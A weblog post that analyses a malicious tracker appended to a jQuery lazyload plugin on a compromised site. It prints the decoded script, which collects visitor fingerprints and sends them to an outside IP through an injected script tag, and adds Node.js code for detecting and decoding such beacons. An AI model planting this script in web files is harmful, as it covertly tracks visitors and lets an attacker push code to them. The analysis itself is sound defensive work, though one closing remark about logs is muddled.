
Keep It Simple, Stupid.

荒野无灯weblog

Louis Han's site has probably been hit

Yesterday someone sent me a piece of malicious PHP code to analyze, and today I ran into malicious JS as well...
Today I was looking for a site that uses jquery.lazyload.js and ended up at Louis Han's to take a look.
It turned out that the site's copy of this js file had a block of encoded JS appended to its end. Decoded, it reads as follows:

// Decoded payload, with the string quotes that the page extraction stripped put back.
// The bracket notation with quoted property names is a leftover of the obfuscation.
element = document['getElementById']('sc_co');
if (!element) {                                  // guard: only inject the beacon once per page
  cls = screen['colorDepth'];                    // browser/screen fingerprint
  sw = screen['width'];
  sh = screen['height'];
  dc = document['charset'];
  lc = document['location'];                     // URL of the page the victim is on
  refurl = escape(document['referrer']);         // where the victim came from
  ua = escape(navigator['userAgent']);
  var js = document['createElement']('script');  // a <script> element is the exfiltration channel
  js['id'] = 'sc_co';
  js['src'] = 'http://91.196.216.64/s.php?ref=' + refurl + '&cls=' + cls + '&sw=' + sw + '&sh=' + sh + '&dc=' + dc + '&lc=' + lc + '&ua=' + ua;
  var head = document['getElementsByTagName']('head')[0];
  head['appendChild'](js);                       // appending it makes the browser issue the GET
}

The src it builds looks roughly like this:

http://91.196.216.64/s.php?ref=&cls=32&sw=1366&sh=768&dc=gb2312&lc=file:///C:/Users/HuangYe/Downloads/jquery-image-lazy-loading/a.html&ua=Mozilla/5.0%20%28compatible%3B%20MSIE%209.0%3B%20Windows%20NT%206.1%3B%20Trident/5.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20Tablet%20PC%202.0%3B%20.NET4.0C%3B%20.NET4.0E%29

So this is a covert collector of visitor information. The script src exists only to make the victim's browser send an HTTP GET to 91.196.216.64 with the collected fields (referrer, color depth, screen size, charset, current URL, user agent) in the query string; the sc_co id check just keeps it from being injected twice on the same page. One caveat worth keeping in mind: because the request goes through a <script> element, whatever s.php returns is executed in the page, so the same hook could push arbitrary JavaScript to visitors and not merely record them.
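Two things the analysis above implies but does not show in code are how to catch this pattern in a plugin file and how to recover what a captured beacon URL leaks. The following is an added example, not code from the original post or from Louis Han's site. It runs on Node.js with no dependencies; the plugin file contents and the captured URL (shortened) are constructed from the decoded snippet and the src shown above, and the detection heuristics (a hard-coded raw-IP URL plus injector traits) are my own assumptions, not something the post states.

```javascript
// Added example, not code from the original post or from Louis Han's site.
// Runs on Node.js (no dependencies).
//   findScriptBeacons(source)  flags a tail-appended script injector in a JS file
//   decodeBeacon(url)          turns a captured beacon URL back into the leaked fields
// Sample inputs at the bottom are constructed from the snippet and src in the post.

// Assumption: a plugin file almost never loads a script from a bare IPv4 address,
// so a hard-coded URL with an IPv4 host is worth flagging on its own.
const IPV4_URL = /https?:\/\/(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\/[^'"\s]*/g;

// Traits of the injector itself. The optional ['"]\] after createElement also
// matches the obfuscated form document['createElement']('script').
const INJECTOR_HINTS = [
  /createElement(?:['"]\s*\])?\s*\(\s*['"]script['"]\s*\)/,      // dynamic <script> creation
  /\[\s*['"](?:appendChild|getElementsByTagName)['"]\s*\]/,     // DOM calls via quoted bracket access
  /escape\s*\(\s*(?:document|navigator)\s*\[/,                  // fingerprint fields encoded for a URL
];

// Returns one record per IPv4 URL found in `source`, annotated with how many
// injector traits the file also shows. A raw-IP URL plus two or more traits is
// treated as a beacon (heuristic chosen for this example).
function findScriptBeacons(source) {
  const hints = INJECTOR_HINTS.filter((re) => re.test(source)).length;
  const beacons = [];
  for (const m of source.matchAll(IPV4_URL)) {
    beacons.push({ url: m[0], host: m[1], injectorHints: hints, suspicious: hints >= 2 });
  }
  return beacons;
}

// Decodes a captured beacon URL. The malware encodes values with escape(), which
// emits %uXXXX for characters outside Latin-1; unescape() is its exact inverse,
// whereas decodeURIComponent() would throw on a %u sequence. The query string is
// split by hand so that no URL normalisation alters the raw values.
function decodeBeacon(url) {
  const q = url.indexOf('?');
  const base = q < 0 ? url : url.slice(0, q);
  const query = q < 0 ? '' : url.slice(q + 1);
  const host = base.replace(/^https?:\/\//, '').split('/')[0];
  const fields = {};
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq < 0 ? pair : pair.slice(0, eq);
    fields[key] = eq < 0 ? '' : unescape(pair.slice(eq + 1));
  }
  return { host, fields };
}

// Constructed sample: a stub plugin body followed by the decoded tail from the post.
const SAMPLE_LAZYLOAD_JS = [
  "(function($){$.fn.lazyload=function(options){return this;};})(jQuery);",
  "element=document['getElementById']('sc_co');if(!element){cls=screen['colorDepth'];" +
  "sw=screen['width'];sh=screen['height'];dc=document['charset'];lc=document['location'];" +
  "refurl=escape(document['referrer']);ua=escape(navigator['userAgent']);" +
  "var js=document['createElement']('script');js['id']='sc_co';" +
  "js['src']='http://91.196.216.64/s.php?ref='+refurl+'&cls='+cls+'&sw='+sw+'&sh='+sh+'&dc='+dc+'&lc='+lc+'&ua='+ua;" +
  "var head=document['getElementsByTagName']('head')[0];head['appendChild'](js);}",
].join('\n');

// Constructed from the src shown in the post (user agent shortened).
const CAPTURED_SRC = 'http://91.196.216.64/s.php?ref=&cls=32&sw=1366&sh=768&dc=gb2312' +
  '&lc=file:///C:/Users/HuangYe/Downloads/jquery-image-lazy-loading/a.html' +
  '&ua=Mozilla/5.0%20%28compatible%3B%20MSIE%209.0%3B%20Windows%20NT%206.1%3B%20Trident/5.0%29';

console.log(findScriptBeacons(SAMPLE_LAZYLOAD_JS));
console.log(decodeBeacon(CAPTURED_SRC));
```

In practice the scan belongs in whatever check compares a deployed plugin file against the copy you originally downloaded; a tail-appended injector like this one shows up as a size or hash change first, and the pattern match above tells you what the extra bytes do. The decoder is useful on web-server access logs, where the beacon's GET never appears (it goes to the attacker's host), but on a proxy or IDS capture it does.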

The decoder used for the JS came from here.
